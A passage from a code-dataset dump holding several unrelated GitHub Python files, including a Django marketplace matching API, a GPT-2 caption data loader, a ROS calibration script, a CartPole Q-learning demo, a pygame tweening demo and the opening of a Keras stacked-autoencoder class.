'type' in strictList:\n\t\tif ((dbSpecRelValue/5.0) * 100) != 100:\n\t\t\treturn -2\n\n\treturn (dbSpecRelValue/5.0) * 100\t\n\ndef matchSex(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == '' or dbSpec == '':\n\t\treturn -1\n\n\tif 'sex' in strictList:\n\t\tif pkSpec != dbSpec:\n\t\t\treturn -2\n\n\tif pkSpec == dbSpec:\n\t\treturn 100\n\telif 'Unisex' in [pkSpec, dbSpec]:\n\t\treturn 50\n\telse:\n\t\treturn 0\n\ndef matchBrand(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == '' or dbSpec == '':\n\t\treturn -1\n\n\tif 'brand' in strictList:\n\t\tif pkSpec != dbSpec:\n\t\t\treturn -2\n\n\tif pkSpec != dbSpec:\n\t\treturn 0\n\telse:\n\t\treturn 100\n\ndef matchModel(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == '' or dbSpec == '':\n\t\treturn -1\n\n\tif 'model' in strictList:\n\t\tif fuzz.ratio(pkSpec, dbSpec) != 100:\n\t\t\treturn -2\n\n\treturn (fuzz.partial_ratio(pkSpec, dbSpec) + fuzz.token_sort_ratio(pkSpec, dbSpec) + fuzz.ratio(pkSpec, dbSpec))/3\n\ndef matchCondition(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == '':\n\t\treturn -1\n\telse:\n\t\tpkSpecVal = CONDITIONOPTS[pkSpec]\n\n\t\t\n\tif dbSpec == '':\n\t\tdbSpecVal = 5.0\n\telse:\n\t\tdbSpecVal = CONDITIONOPTS[dbSpec]\n\n\tif 'condition' in strictList:\n\t\tif pkSpec != dbSpec:\n\t\t\treturn -2\n\n\tif pkSpecVal == dbSpecVal:\n\t\treturn 100\n\telif (pkSpecVal > dbSpecVal):\n\t\treturn 100.0 - ((pkSpecVal - dbSpecVal)/5.0 * 100.0)\n\telif (pkSpecVal < dbSpecVal):\n\t\treturn 100 - ((dbSpecVal - pkSpecVal)/5.0 * 100.0)\n\n\treturn 0\n\n\ndef matchMaterial(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == '' or dbSpec == '':\n\t\treturn -1\n\n\tif 'material' in strictList:\n\t\tif pkSpec != dbSpec:\n\t\t\treturn -2\n\n\tif pkSpec == dbSpec:\n\t\treturn 100\n\telse:\n\t\treturn 0\n\ndef matchColour(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == '' or dbSpec == '':\n\t\treturn -1\n\n\tif 'colour' in strictList:\n\t\tif fuzz.token_sort_ratio(pkSpec, dbSpec) != 100:\n\t\t\treturn -2\n\n\treturn (fuzz.token_sort_ratio(pkSpec, dbSpec))\n\ndef matchSize(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == 0.0 or dbSpec == 0.0:\n\t\treturn -1\n\n\tif 'size' in strictList:\n\t\tif pkSpec != dbSpec:\n\t\t\treturn -2\n\n\tif pkSpec == dbSpec:\n\t\treturn 100\n\telif pkSpec > dbSpec:\n\t\tdiff = pkSpec - dbSpec\n\t\treturn 100.0 - (diff/13.5 * 100)\n\telif pkSpec < dbSpec:\n\t\tdiff = dbSpec - pkSpec\n\t\treturn 100.0 - (diff/13.5 * 
100)\n\ndef getStrict(pkSpec):\n\n\tstrictList = []\n\n\tif pkSpec.type_strict == True:\n\t\tstrictList.append('type')\n\tif pkSpec.sex_strict == True:\n\t\tstrictList.append('sex')\n\tif pkSpec.brand_strict == True:\n\t\tstrictList.append('brand')\n\tif pkSpec.model_strict == True:\n\t\tstrictList.append('model')\n\tif pkSpec.colour_strict == True:\n\t\tstrictList.append('colour')\n\tif pkSpec.condition_strict == True:\n\t\tstrictList.append('condition')\n\tif pkSpec.material_strict == True:\n\t\tstrictList.append('material')\n\tif pkSpec.size_strict == True:\n\t\tstrictList.append('size')\n\n\treturn strictList\n\ndef getPriority(pkSpec):\n\n\tpriorityList = []\n\n\tif pkSpec.type_priority == True:\n\t\tpriorityList.append('type')\n\tif pkSpec.sex_priority == True:\n\t\tpriorityList.append('sex')\n\tif pkSpec.brand_priority == True:\n\t\tpriorityList.append('brand')\n\tif pkSpec.model_priority == True:\n\t\tpriorityList.append('model')\n\tif pkSpec.colour_priority == True:\n\t\tpriorityList.append('colour')\n\tif pkSpec.condition_priority == True:\n\t\tpriorityList.append('condition')\n\tif pkSpec.material_priority == True:\n\t\tpriorityList.append('material')\n\tif pkSpec.size_priority == True:\n\t\tpriorityList.append('size')\n\n\treturn priorityList\n\ndef prioritiseField(field):\n\n\treturn field * 1.5\n\ndef authenticate(username, token):\n\ttry:\n\t\tuser = User.objects.get(username=username, token=token)\n\t\treturn user\n\texcept User.DoesNotExist:\n\t\treturn None\n\nclass UserViewSet(\n\tmixins.RetrieveModelMixin, \n\tmixins.UpdateModelMixin, \n\tmixins.DestroyModelMixin, \n\tmixins.ListModelMixin, \n\tviewsets.GenericViewSet):\n\tqueryset = User.objects.all().order_by('uid')\n\tserializer_class = UserSerializer\n\nclass ProfileViewSet(viewsets.ModelViewSet):\n\tqueryset = Profile.objects.all().order_by('uid')\n\tserializer_class = ProfileSerializer\n\nclass NewUserView(APIView):\n\n\tdef post(self, request, format=None):\n\n\t\temail = request.POST.get('email')\n\t\tusername = request.POST.get('username')\n\t\tfirst_name = request.POST.get('first_name')\n\t\tlast_name = request.POST.get('last_name')\n\t\tpassword = make_password(request.POST.get('password'), salt=None, hasher='default')\n\n\t\tnewUser = User.objects.create(\n\t\t\temail=email, \n\t\t\tusername=username,\n\t\t\tpassword=password)\n\n\t\tnewUserProfile = Profile.objects.create(\n\t\t\tuser=newUser,\n\t\t\tfirst_name=first_name,\n\t\t\tlast_name=last_name)\n\n\t\tqueryset = newUser\n\t\tserializer = SensitiveUserSerializer(queryset)\n\n\t\treturn Response(serializer.data)\n\nclass LoginView(APIView):\n\n\tdef post(self, request, format=None):\n\n\t\tusername = request.POST.get('username')\n\t\tpassword = request.POST.get('password')\n\n\t\ttry:\n\t\t\tuser = User.objects.get(username=username)\n\t\t\tif check_password(password, user.password):\n\t\t\t\ttoken = uuid.uuid4().hex\n\t\t\t\tuser.token = token\n\t\t\t\tuser.save()\n\n\t\t\t\treturn Response(token)\n\t\texcept User.DoesNotExist:\n\t\t\treturn Response(\"Failed to login. 
Username or Password is incorrect.\", status=status.HTTP_400_BAD_REQUEST)\n\nclass LogoutView(APIView):\n\n\tdef post(self, request, format=None):\n\t\tusername = request.POST.get('username')\n\t\ttoken = request.POST.get('token')\n\n\t\tuser = authenticate(username, token)\n\t\tif user is not None:\n\t\t\tuser.token = None\n\t\t\tuser.save()\n\t\t\treturn Response(\"You've been successfully logged out.\")\n\t\telse:\n\t\t\treturn Response(\"REDIRECT SOMEWHERE\")\n\nclass ListingViewSet(viewsets.ModelViewSet):\n\tqueryset = Listing.objects.all().order_by('uid')\t\n\tserializer_class = ListingSerializer\n\nclass NotificationViewSet(viewsets.ModelViewSet):\n\tqueryset = Notification.objects.all().order_by('uid')\n\tserializer_class = NotificationSerializer\n\nclass ImageViewSet(viewsets.ModelViewSet):\n\tqueryset = Image.objects.all().order_by('uid')\n\tserializer_class = ImageSerializer\n\nclass MatchingView(APIView):\n\n\tdef get(self, request, pk, format=None):\n\t\n\t\tpkSpec = Listing.objects.get(pk=pk)\n\t\tdbSpecs = Listing.objects.all().exclude(listing_type=pkSpec.listing_type)\n\n\t\tstrictList = []\n\t\tpriorityList = []\n\n\t\tif pkSpec.listing_type == \"Buying\":\n\n\t\t\tstrictList = getStrict(pkSpec)\n\t\t\tpriorityList = getPriority(pkSpec)\n\n\t\tfor dbSpec in dbSpecs:\n\t\t\tif dbSpec.uid != pkSpec.uid:\n\t\t\t\tif dbSpec.listing_type != pkSpec.listing_type:\n\t\t\t\t\tvalidFields = 8\n\t\t\t\t\ttypePc = matchType(pkSpec.item_type, dbSpec.item_type, strictList)\n\t\t\t\t\tsexPc = matchSex(pkSpec.item_sex, dbSpec.item_sex, strictList)\n\t\t\t\t\tbrandPc = matchBrand(pkSpec.item_brand, dbSpec.item_brand, strictList)\n\t\t\t\t\tmodelPc = 0\n\t\t\t\t\tif brandPc == 100 or brandPc == -1:\n\t\t\t\t\t\tmodelPc = matchModel(pkSpec.item_model, dbSpec.item_model, strictList)\n\t\t\t\t\tcolourPc = matchColour(pkSpec.item_colour, dbSpec.item_colour, strictList)\n\t\t\t\t\tconditionPc = matchCondition(pkSpec.item_condition, dbSpec.item_condition, strictList)\n\t\t\t\t\tmaterialPc = matchMaterial(pkSpec.item_material, dbSpec.item_material, strictList)\n\t\t\t\t\tsizePc = matchSize(pkSpec.item_size, dbSpec.item_size, strictList)\n\t\t\t\t\tvalueList = [typePc, sexPc, brandPc, modelPc, colourPc, conditionPc, materialPc, sizePc]\n\t\t\t\t\ttotalPc = 0\n\t\t\t\t\tif priorityList != []:\n\t\t\t\t\t\tfor priority in priorityList:\n\t\t\t\t\t\t\tif priority == 'type' and typePc != -1:\n\t\t\t\t\t\t\t\ttypePc = prioritiseField(typePc)\n\t\t\t\t\t\t\telif priority == 'sex' and sexPc != -1:\n\t\t\t\t\t\t\t\tsexPc = prioritiseField(sexPc)\n\t\t\t\t\t\t\telif priority == 'brand' and brandPc != -1:\n\t\t\t\t\t\t\t\tbrandPc = prioritiseField(brandPc)\n\t\t\t\t\t\t\telif priority == 'model' and modelPc != -1:\n\t\t\t\t\t\t\t\tmodelPc = prioritiseField(modelPc)\n\t\t\t\t\t\t\telif priority == 'colour' and colourPc != -1:\n\t\t\t\t\t\t\t\tcolourPc = prioritiseField(colourPc)\n\t\t\t\t\t\t\telif priority == 'condition' and conditionPc != -1:\n\t\t\t\t\t\t\t\tconditionPc = prioritiseField(conditionPc)\n\t\t\t\t\t\t\telif priority == 'material' and materialPc != -1:\n\t\t\t\t\t\t\t\tmaterialPc = prioritiseField(materialPc)\n\t\t\t\t\t\t\telif priority == 'size' and sizePc != -1:\n\t\t\t\t\t\t\t\tsizePc = prioritiseField(sizePc)\n\t\t\t\t\t\t# rebuild the list so the prioritised values are actually included in the total\n\t\t\t\t\t\tvalueList = [typePc, sexPc, brandPc, modelPc, colourPc, conditionPc, materialPc, sizePc]\n\n\t\t\t\t\tfor value in valueList:\n\t\t\t\t\t\tif value == -2:\n\t\t\t\t\t\t\tdbSpec.item_matching = -2 # a strict field failed; scoring is skipped below\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tif value != -1:\n\t\t\t\t\t\t\ttotalPc = totalPc + value\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tvalidFields = validFields - 
1\n\t\t\t\t\t#totalPc = (typePc + sexPc + brandPc + modelPc + \n\t\t\t\t\t#colourPc + conditionPc + materialPc + sizePc)/validFields\n\t\t\t\t\tif dbSpec.item_matching != -2:\n\t\t\t\t\t\tif validFields == 0 :\n\t\t\t\t\t\t\tdbSpec.item_matching = 100.0\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tdbSpec.item_matching = totalPc/validFields\n\n\t\t\t\t\t\tif dbSpec.item_matching > 100.0:\n\t\t\t\t\t\t\tdbSpec.item_matching = 100.0\n\n\t\tqueryset = dbSpecs\n\t\tserializer = MatchingSerializer(dbSpecs, many=True)\n\t\treturn Response(serializer.data)","repo_name":"s3542733/skyjacs_public","sub_path":"django-server/skyjacs_server/skyjacs_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"74196709192","text":"import json\nimport random\nimport torch\nimport numpy as np\nimport progressbar\nfrom torch.nn.utils import rnn\n\nclass Data:\n    def __init__(self, model_name, train_path, dev_path, test_path, max_len, \n        sos_token, pad_token, add_eos_token_to_data):\n        '''\n            model_name: gpt2\n            train_path: training data path\n            dev_path: validation data path\n            test_path: test data path \n            max_len: maximum length for training sequences \n            sos_token: initialized sos token <-start_of_text->\n            pad_token: used to pad the sequences <-pad->\n            add_eos_token_to_data: whether we want the model to learn to generate the eos token;\n                if so, the model could automatically stop generation by generating eos token\n        '''\n        from transformers import GPT2TokenizerFast\n        self.tokenizer = GPT2TokenizerFast.from_pretrained(model_name)\n        self.sos_token, self.sos_token_id = self.add_special_token(sos_token)\n        print ('sos token is {}, sos token id is {}'.format(self.sos_token, self.sos_token_id))\n        self.pad_token, self.pad_token_id = self.add_special_token(pad_token)\n        print ('pad token is {}, pad token id is {}'.format(self.pad_token, self.pad_token_id))\n        self.eos_token, self.eos_token_id = self.tokenizer.bos_token, self.tokenizer.bos_token_id\n        print ('eos token is {}, eos token id is {}'.format(self.eos_token, self.eos_token_id))\n        self.add_eos_token_to_data = add_eos_token_to_data\n\n        self.max_len = max_len\n        self.train_token_list, self.train_token_id_list = self.process_one_file(train_path)\n        self.dev_token_list, self.dev_token_id_list = self.process_one_file(dev_path)\n        self.test_token_list, self.test_token_id_list = self.process_one_file(test_path)\n        self.train_num, self.dev_num, self.test_num = len(self.train_token_list), len(self.dev_token_list), \\\n            len(self.test_token_list)\n        print ('train number:{}, dev number:{}, test number:{}'.format(self.train_num, self.dev_num, self.test_num))\n\n        self.train_idx_list = [i for i in range(self.train_num)]\n        random.shuffle(self.train_idx_list)\n        self.dev_idx_list = [j for j in range(self.dev_num)]\n        self.test_idx_list = [j for j in range(self.test_num)]\n        self.dev_current_idx, self.test_current_idx = 0, 0\n\n    def add_special_token(self, special_token):\n        if special_token in self.tokenizer.vocab:\n            print (special_token + ' token exists.')\n        else:\n            print ('Add token to the tokenizer.')\n            print ('Original vocabulary size is {}'.format(len(self.tokenizer)))\n            self.tokenizer.add_tokens([special_token])\n            print ('Vocabulary size after extension is {}'.format(len(self.tokenizer)))\n            assert len(self.tokenizer.convert_tokens_to_ids([special_token])) == 1\n        special_token_id = self.tokenizer.convert_tokens_to_ids([special_token])[0]\n        return special_token, 
special_token_id\n\n def process_one_file(self, path):\n print ('Processing {}'.format(path))\n with open(path) as f:\n item_list = json.load(f)\n lines = []\n for item in item_list:\n captions_list = item['captions']\n for one_caption in captions_list:\n lines.append(one_caption.strip())\n\n res_token_list, res_token_id_list = [], []\n n = len(lines)\n p = progressbar.ProgressBar(n)\n p.start()\n for i in range(n):\n p.update(i)\n text = lines[i].strip('\\n')\n self.process_one_text(text, res_token_list, res_token_id_list)\n p.finish()\n print ('{} processed!'.format(path))\n return res_token_list, res_token_id_list\n\n def process_one_text(self, text, res_token_list, res_token_id_list):\n tokens = self.tokenizer.tokenize(text, max_length=self.max_len, truncation=True)\n if len(tokens) <= 1: # filter out too short sequence\n return\n tokens = [self.sos_token] + tokens[:self.max_len]\n if self.add_eos_token_to_data:\n tokens = tokens + [self.eos_token]\n token_ids = self.tokenizer.convert_tokens_to_ids(tokens)\n res_token_list.append(tokens)\n res_token_id_list.append(token_ids)\n return\n\n def pad_batch(self, batch_id_list):\n batch_id_list = [torch.LongTensor(item) for item in batch_id_list]\n batch_tensor = rnn.pad_sequence(batch_id_list, batch_first=True, padding_value=self.pad_token_id)\n batch_mask = torch.ones_like(batch_tensor)\n batch_mask = batch_mask.masked_fill(batch_tensor.eq(self.pad_token_id), 0.0).type(torch.FloatTensor)\n return batch_tensor, batch_mask\n\n def process_output(self, batch_tgt_id_list):\n batch_tgt_id_list = [torch.LongTensor(item) for item in batch_tgt_id_list]\n batch_tgt_tensor, _ = self.pad_batch(batch_tgt_id_list) # padded target sequence\n batch_tgt_input_tensor = batch_tgt_tensor[:, :-1].clone()\n batch_tgt_output_tensor = batch_tgt_tensor[:, 1:].clone()\n return batch_tgt_input_tensor, batch_tgt_output_tensor\n\n def parse_batch(self, batch_id_list):\n batch_input, batch_labels = self.process_output(batch_id_list)\n batch_labels[batch_labels[:, :] == self.pad_token_id] = -100\n return batch_input, batch_labels\n\n def get_next_train_batch(self, batch_size):\n batch_idx_list = random.sample(self.train_idx_list, batch_size)\n batch_id_list, batch_token_list = [], []\n\n for idx in batch_idx_list:\n batch_id_list.append(self.train_token_id_list[idx])\n batch_token_list.append(self.train_token_list[idx])\n batch_input_tensor, batch_labels = self.parse_batch(batch_id_list)\n return batch_input_tensor, batch_labels, batch_token_list\n\n def get_next_validation_batch(self, batch_size, mode):\n batch_id_list, batch_token_list = [], []\n if mode == 'dev':\n curr_select_idx, instance_num = self.dev_current_idx, self.dev_num\n tgt_token_id_list, tgt_token_list = self.dev_token_id_list, self.dev_token_list\n elif mode == 'test':\n curr_select_idx, instance_num = self.test_current_idx, self.test_num\n tgt_token_id_list, tgt_token_list = self.test_token_id_list, self.test_token_list\n else:\n raise Exception('Wrong Validation Mode!!!')\n\n if curr_select_idx + batch_size < instance_num:\n for i in range(batch_size):\n curr_idx = curr_select_idx + i\n batch_id_list.append(tgt_token_id_list[curr_idx])\n batch_token_list.append(tgt_token_list[curr_idx])\n if mode == 'dev':\n self.dev_current_idx += batch_size\n else:\n self.test_current_idx += batch_size\n else:\n for i in range(batch_size):\n curr_idx = curr_select_idx + i\n if curr_idx > instance_num - 1: \n curr_idx = 0\n if mode == 'dev':\n self.dev_current_idx = 0\n else:\n self.test_current_idx = 0\n 
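# editor's note (added comment): at this point curr_idx has wrapped past the end of\n                # the split, so the final incomplete batch is padded by re-reading from index 0\n                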
batch_id_list.append(tgt_token_id_list[curr_idx])\n                batch_token_list.append(tgt_token_list[curr_idx])\n            if mode == 'dev':\n                self.dev_current_idx = 0\n            else:\n                self.test_current_idx = 0\n        batch_input_tensor, batch_labels = self.parse_batch(batch_id_list)\n        return batch_input_tensor, batch_labels, batch_token_list\n","repo_name":"yxuansu/MAGIC","sub_path":"image_captioning/language_model/dataclass.py","file_name":"dataclass.py","file_ext":"py","file_size_in_byte":7624,"program_lang":"python","lang":"en","doc_type":"code","stars":238,"dataset":"github-code","pt":"27"} +{"seq_id":"28978843379","text":"#!/usr/bin/env python\n\nimport rospy\nfrom simple_handeye_calibration import *\n\nrospy.init_node('handeye_server')\n\nmarker = rospy.get_param(\"~camera_marker\",\"ar_marker_0\")\ncamera_link = rospy.get_param(\"~camera_link\",\"camera_link\")\nbase_link = rospy.get_param(\"~base_link\",\"base_link\")\nee_marker = rospy.get_param(\"~ee_marker\",\"ee_marker\")\n\nsrv = SimpleHandeyeCalibration(\n    marker=marker,\n    camera_link=camera_link,\n    ee_marker=ee_marker,\n    base_link=base_link)\n\nsrv.spin(rospy.Rate(10))\n","repo_name":"cpaxton/costar_stack","sub_path":"costar_robot/simple_handeye_calibration/scripts/calibration_server.py","file_name":"calibration_server.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"27"} +{"seq_id":"23111208162","text":"import numpy as np\nimport pandas as pd\n\ndf = pd.DataFrame({'string': list('abc'),\n                   'int64': list(range(1, 4)),\n                   'uint8': np.arange(3, 6).astype('u1'),\n                   'float64': np.arange(4.0, 7.0),\n                   'bool1': [True, False, True],\n                   'bool2': [False, True, False],\n                   'dates': pd.date_range('now', periods=3).values,\n                   'category': pd.Series(list(\"ABC\")).astype('category')})\ndf['tdeltas'] = df.dates.diff()\ndf['uint64'] = np.arange(3, 6).astype('u8')\ndf['other_dates'] = pd.date_range('20130101', periods=3).values\ndf['tz_aware_dates'] = pd.date_range('20130101', periods=3, tz='US/Eastern')\nprint(df)\nprint(df.dtypes)\n\n# select_dtypes()\nprint(df.select_dtypes(include=[bool]))\nprint(df.select_dtypes(include=['bool']))\nprint(df.select_dtypes(include=['number', 'bool'], exclude=['unsignedinteger']))\nprint(df.select_dtypes(include=['object']))\n\n\n# print the subclass tree of a dtype\ndef subdtypes(dtype):\n    subs = dtype.__subclasses__()\n    if not subs:\n        return dtype\n    return [dtype, [subdtypes(dt) for dt in subs]]\n\n\nprint(subdtypes(np.generic))\n","repo_name":"sunjiaxin111/pandas_learn","sub_path":"Pandas基本功能/根据dtype选择列.py","file_name":"根据dtype选择列.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32699651480","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom comtypes.client import *\nfrom comtypes.gen import STKObjects\n\nfrom misc.Scenario import Scenario\n\nclass DataProvider:\n    \n    def __init__(self, stkRoot, scenario) -> None:\n        self.root = stkRoot\n        self.sc = scenario\n        self.sc2 = Scenario.getScenarioI(self.sc)\n\n\n    # fetch the time, speed, radial and in-track fields from the data provider and store them in result\n    # !note: the element names are case sensitive; getting the case wrong raises an error\n    def getResult(self, sat: STKObjects, elems = [\"Time\", \"speed\", \"radial\", \"in-track\"]) -> dict:\n        \n        # get the Cartesian velocity; each data provider exposes a different set of attributes\n        cartV = sat.Dataproviders.Item(\"Cartesian Velocity\")\n        cartVI = cartV.QueryInterface(STKObjects.IAgDataProviderGroup)\n\n        # read the ICRF group under Cartesian Velocity; ICRF is a coordinate frame offering xyz, time, speed, etc.\n        cartVicrf 
= cartVI.Group.Item(\"ICRF\")\n        cartVicrfI = cartVicrf.QueryInterface(STKObjects.IAgDataPrvTimeVar)\n\n        # set the time step to 60 seconds and fetch the data\n        # rawResult type: STKObjects.IAgDrResult\n        rawResult = cartVicrfI.ExecElements(self.sc2.StartTime, self.sc2.StopTime, 60, elems)\n        \n        # pull the requested values out of the raw result\n        result = {}\n        for i in range(len(elems)):\n            result[elems[i]] = rawResult.DataSets.Item(i).GetValues()\n        return result\n    \n    \n    def showResult(self, result):\n        # show the first five rows with pandas\n        dataframe = pd.DataFrame(result)\n        print(dataframe.head(5))\n    \n    \n    def drawResult(self, result, var):\n        # plot how the speed changes over time\n        plt.plot(result[var])\n        plt.xlabel(\"Time [mins]\")\n        plt.ylabel(\"Speed [km/sec]\")\n        plt.title(\"Speed vs Time\")\n        plt.show()\n\n\n\n","repo_name":"CrispOvO/stk_sample","sub_path":"analysis/dataprovider.py","file_name":"dataprovider.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"14671868474","text":"import gymnasium as gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom QLearning import QLearning\n\nenv = gym.make('CartPole-v1')\n(state, _) = env.reset()\n\nupper_bounds = env.observation_space.high\nlower_bounds = env.observation_space.low\ncart_vel_min = -3\ncart_vel_max = 3\npole_angle_vel_min = -10\npole_angle_vel_max = 10\nupper_bounds[1] = cart_vel_max\nlower_bounds[1] = cart_vel_min\nupper_bounds[3] = pole_angle_vel_max\nlower_bounds[3] = pole_angle_vel_min\n\nbin_size = 30\n\nalpha = 0.1\ngamma = 1\nepsilon = 0.2\nnumber_of_episodes = 15000\n\nQ1 = QLearning(env, alpha, gamma, epsilon, number_of_episodes, bin_size, lower_bounds, upper_bounds)\n\nQ1.train()\n\n(obtained_rewards_optimal, env1) = Q1.simulate_learned_strategy()\n\nplt.figure(figsize= (12, 5))\nplt.plot(Q1.sum_rewards_episode, color = 'blue', linewidth = 1)\nplt.xlabel('Episode')\nplt.ylabel('Reward')\nplt.yscale('log')\nplt.show()\nplt.savefig('convergence.png')\n\nenv1.close()\n\n(obtained_rewards_random, env2) = Q1.simulate_random_strategy()\nplt.hist(obtained_rewards_random)\nplt.xlabel('Sum of rewards')\nplt.ylabel('Percentage')\nplt.savefig('histogram.png')\nplt.show()\n\n(obtained_rewards_optimal, env1) = Q1.simulate_learned_strategy()","repo_name":"Ancientkingg/cartpole","sub_path":"src/barebones-implementation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"73999938310","text":"#!/usr/bin/python\n# M.E.Farmer 2013\n# demo for tween library\n# showing integration with PyGame\n# moves text from random points using various tweens\n# changes from random color to random color using the same tween\n# Mouse click rotates through tweens and ESC closes demo\nimport sys\nimport pygame\nimport random\nimport tween\n\n\n# higher number equal slower transitions\n# stall/fps = seconds per transition\nstall=offset = 60\nFPS = 60\nBACKGROUND_COLOR = (0,0,0)\nsize = width, height = (800,600)\ntext_pos = (0,0)\ntext_color = (0,128,0)\n\ntweens = [\n    (tween.easeLinear,\"easeLinear\"),\n    (tween.easeInQuad,\"easeInQuad\"),\n    (tween.easeInOutQuad,\"easeInOutQuad\"),\n    (tween.easeOutQuad,\"easeOutQuad\"),\n    (tween.easeInCubic,\"easeInCubic\"),\n    (tween.easeInOutCubic,\"easeInOutCubic\"),\n    (tween.easeOutCubic,\"easeOutCubic\"),\n    (tween.easeInQuartic,\"easeInQuartic\"),\n    (tween.easeInOutQuartic,\"easeInOutQuartic\"),\n    (tween.easeOutQuartic,\"easeOutQuartic\"),\n    (tween.easeInQuintic,\"easeInQuintic\"),\n    
(tween.easeInOutQuintic,\"easeInOutQuintic\"),\n    (tween.easeOutQuintic,\"easeOutQuintic\"),\n    (tween.easeInSine,\"easeInSine\"),\n    (tween.easeInOutSine,\"easeInOutSine\"),\n    (tween.easeOutSine,\"easeOutSine\"),\n    (tween.easeInExpo,\"easeInExpo\"),\n    (tween.easeInOutExpo,\"easeInOutExpo\"),\n    (tween.easeOutExpo,\"easeOutExpo\"),\n    (tween.easeInCirc,\"easeInCirc\"),\n    (tween.easeInOutCirc,\"easeInOutCirc\"),\n    (tween.easeOutCirc,\"easeOutCirc\"),\n    (tween.easeInElasticBig,\"easeInElasticBig\"),\n    (tween.easeOutElasticBig,\"easeOutElasticBig\"),\n    (tween.easeInElasticSmall,\"easeInElasticSmall\"),\n    (tween.easeOutElasticSmall,\"easeOutElasticSmall\"),\n    (tween.easeLoop,\"easeLoop\"),\n    (tween.easeInchWorm,\"easeInchWorm\"),\n    (tween.customTween(\n        \"b+c*(26.65*tc*ts + -91.5925*ts*ts + 115.285*tc + -62.89*ts + 13.5475*t)\"),\n        \"customTween\")\n    ]\n# set up the initial tween\ntween_index = 0\nease_func,text_displayed = tweens[tween_index]\n\npygame.init()\nscreen = pygame.display.set_mode(size,pygame.FULLSCREEN)\nFPSTICKER = pygame.time.Clock()\nfont = pygame.font.SysFont(\"comicsansms\",65)\ntext = font.render(text_displayed, True, text_color)\n\nwhile True:\n    for event in pygame.event.get():\n        if event.type == pygame.MOUSEBUTTONDOWN:\n            if tween_index == len(tweens)-1:\n                tween_index=0\n            else:\n                tween_index+=1\n            ease_func,text_displayed = tweens[tween_index]\n            \n            # set our stall counter to change the tween on next check\n            stall = offset\n        elif event.type == pygame.QUIT or (event.type == pygame.KEYDOWN\n                and event.key == pygame.K_ESCAPE):\n            sys.exit()\n    screen.fill(BACKGROUND_COLOR)\n    # the pygame clock runs faster than we want to update\n    # our tweens so we just stall for a few cycles then\n    # update and reset our counter \n    stall+=1\n    if stall >= offset:\n        stall=0\n        old_pos = text_pos\n        text_pos = (random.randint(1,width),random.randint(1,height))\n        # set a new tween function for the coordinates\n        xy_out = tween.xyTween(ease_func,old_pos,text_pos,offset,False,True)\n        ##x_out = tween.tween(tween.easeLoop,old_pos[0],text_pos[0],offset,False,True)\n        ##y_out = tween.tween(tween.easeInElasticSmall,old_pos[1],text_pos[1],offset,False,True)\n        old_color = text_color\n        text_color = (random.randint(1,255),random.randint(1,255),random.randint(1,255))\n        # set a new tween function for the text colors\n        color_out = tween.colorTween(ease_func,old_color,text_color,offset,False,True)\n        # every frame we just call .next() and the tween does the work\n        text = font.render(text_displayed, True, (color_out.next()))\n        screen.blit(text, xy_out.next())\n        ##screen.blit(text, (x_out.next(),y_out.next()))\n    pygame.display.flip()\n    FPSTICKER.tick(FPS)\n    \n","repo_name":"fenceFoil/canopto","sub_path":"tween_test_pygame.py","file_name":"tween_test_pygame.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31171459789","text":"from keras.layers import Input, Dense, Dropout,Activation,BatchNormalization\nfrom keras.models import Model, Sequential \nfrom keras.optimizers import SGD\nfrom keras.utils.vis_utils import plot_model\nfrom keras.callbacks import TensorBoard, ModelCheckpoint, EarlyStopping, ReduceLROnPlateau,History\nimport math\nimport keras  # needed for the keras.layers.__dict__ lookups below\nadvanced_activations=('PReLU','LeakyReLU')\n\nclass SAE(object):\n    \"\"\" \n    Stacked autoencoders. 
It can be trained in layer-wise manner followed by end-to-end fine-tuning.\n    For a 5-layer (including input layer) example:\n        Autoencoders model: Input -> encoder_0->act -> encoder_1 -> decoder_1->act -> decoder_0;\n        stack_0 model: Input->dropout -> encoder_0->act->dropout -> decoder_0;\n        stack_1 model: encoder_0->act->dropout -> encoder_1->dropout -> decoder_1->act;\n    \n    Usage:\n        from SAE import SAE\n        sae = SAE(dims=[784, 500, 10]) # define a SAE with 5 layers\n        sae.fit(x, epochs=100)\n        features = sae.extract_feature(x)\n    \n    Arguments:\n        dims: list of number of units in each layer of encoder. dims[0] is input dim, dims[-1] is units in hidden layer.\n            The decoder is symmetric with encoder. So number of layers of the auto-encoder is 2*len(dims)-1\n        act: activation (default='relu'), not applied to Input, Hidden and Output layers.\n        drop_rate: drop ratio of Dropout for constructing denoising autoencoder 'stack_i' during layer-wise pretraining\n        batch_size: batch size\n    \"\"\"\n    def __init__(self,\n                 dims,\n                 batchnorm=True,\n                 act='relu',\n                 actinlayercenter='tanh',\n                 drop_rate=0.2,\n                 batch_size=32,\n                 init=\"glorot_uniform\",\n                 use_earlyStop=False,\n                 save_dir='SAE_result_tmp'\n                 ): \n        assert actinlayercenter in [\"tanh\",\"linear\"]\n        self.dims=dims\n        self.n_stacks=len(dims)-1\n        self.n_layers=2*self.n_stacks\n        # honour the constructor arguments instead of hard-coded defaults\n        self.batchnorm=batchnorm\n        self.act=act\n        self.actinlayercenter=actinlayercenter\n        self.drop_rate=drop_rate\n        